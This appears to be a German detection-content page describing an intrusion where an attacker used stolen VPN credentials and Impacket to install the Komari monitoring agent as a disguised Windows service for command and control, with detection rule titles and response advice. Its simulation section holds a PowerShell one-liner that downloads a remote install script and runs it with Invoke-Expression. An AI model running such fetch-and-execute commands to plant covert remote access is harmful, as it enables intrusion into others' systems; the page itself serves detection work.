Komari: Das “Überwachungs” Tool, Das Keine Waffenentwicklung Brauchte
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein Bedrohungsakteur nutzte gestohlene VPN-Zugangsdaten, um auf die Windows-Arbeitsstation eines Huntress-Partners zuzugreifen, aktivierte dann RDP und setzte den Open-Source-Monitoring-Agenten Komari als Dienst auf Systemebene ein, der als Windows Update Service durch NSSM getarnt war. Nach der Installation stellte der Agent eine persistente WebSocket-Verbindung zur von Angreifern kontrollierten Infrastruktur her und bot Funktionen wie Befehlsausführung, Terminalzugriff und Ping-Aktivitäten im Heartbeat-Stil. In der Praxis fungierte das Tool als leichtgewichtiges Command-and-Control-Framework ohne zusätzliche Bewaffnung.
Untersuchung
Der Einbruch begann mit einem SSL-VPN-Login, das von 45.153.34.132ausging, gefolgt von der Nutzung von Impacket’s smbexec.py , um RDP zu aktivieren und eine Reihe von Remote-Befehlen auszuführen. Die Ermittler fanden heraus, dass ein PowerShell-Einzeiler den Komari-Installer direkt von GitHub herunterlud und als Windows-Dienst registrierte. Dieser Dienst startete dann komari-agent.exe, öffnete eine WebSocket-Sitzung zum Server des Angreifers und ermöglichte beliebige Remote-Befehlsausführung auf dem Host.
Minderung
Huntress reagierte, indem die kompromittierte Arbeitsstation isoliert, das betroffene Benutzerkonto deaktiviert und der durch NSSM erstellte Komari-Dienst gestoppt wurde. Die bösartige WebSocket-Verbindung wurde blockiert und der Persistenzmechanismus aus dem System entfernt. Empfohlene Folgeverteidigungsmaßnahmen umfassen die Verschärfung der VPN-Zugriffskontrollen, die Überwachung verdächtiger Dienst-Erstellungsereignisse, die Inspektion ausgehender WebSocket-Aktivitäten und die Verstärkung der RDP-Sicherheit.
Reaktion
Verteidiger sollten die Erstellung eines Windows-Dienstes namens Windows Update Service erkennen, der auf komari-agent.exezeigt, lange ausgehende WebSocket-Verbindungen zu unbekannten Hosts überwachen und auf die Verwendung von Impacket-Tools wie smbexec.py für laterale Bewegungen alarmieren. Wenn identifiziert, sollte der betroffene Endpunkt sofort eingedämmt, kompromittierte Anmeldedaten widerrufen und der Schurken-Dienst aus der Umgebung entfernt werden.
Angriffsfluss
Erkennungen
Mögliche Impacket-Befehlszeilenmuster (über cmdline)
Anzeigen
Mögliche Remote-Code-Ausführung mit Impacket (über cmdline)
Anzeigen
Powershell führt Datei in verdächtigem Verzeichnis unter Verwendung von Bypass-Execution-Policy aus (über cmdline)
Anzeigen
Herunterladen oder Hochladen über Powershell (über cmdline)
Anzeigen
Mögliches Remote-Desktop-Services-Shadowing (über process_creation)
Anzeigen
Verdächtige Firewall-Modifikationen über CLI (über cmdline)
Anzeigen
Verdächtiger Prozess nutzt eine URL in der Befehlszeile (über cmdline)
Anzeigen
Alternative Remote-Zugriffs-/Verwaltungssoftware (über process_creation)
Anzeigen
IOCs (HashSha256) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte
Anzeigen
IOCs (SourceIP) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte
Anzeigen
IOCs (DestinationIP) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte
Anzeigen
Erkennung von Impacket smbexec.py und cmd.exe-Ausführung über RDP [Windows-Prozessaktivierung]
Anzeigen
PowerShell-Ausführung für die Installation des Komari-Agents [Windows PowerShell]
Anzeigen
Erkennung der Komari-Agent-Persistenz über den Windows Update-Dienst [Windows-System]
Anzeigen
Erkennung von unberechtigtem SSLVPN-Zugriff und Aktivitäten nach dem Eindringen [Firewall]
Anzeigen
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden werden.
-
Angriffserzählung & Befehle:
Ein Gegner hat Zugriff auf einen Windows-Host erlangt und möchte den Komari C2-Agent installieren, um die Persistenz zu bewahren und später Anmeldedaten zu dumpen (T1003.001). Um traditionelle Skript-Blocking-Verteidigungen zu umgehen, führt der Angreifer PowerShell mit-ExecutionPolicy Bypassaus und lädt den Installer direkt aus dem öffentlichen GitHub-Repository herunter. Die Befehlszeile entspricht genau der Erkennungsregel und generiert die erwartete Telemetrie. -
Regressionstest-Skript:
# Komari-Agenten-Installation Simulation $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1" $script = (New-Object System.Net.WebClient).DownloadString($url) Invoke-Expression $script -
Aufräumbefehle:
# Entfernen von Dateien, die durch den simulierten Installer erstellt wurden (falls vorhanden) Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue # Stoppen von Komari-Prozessen, die möglicherweise gestartet wurden Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force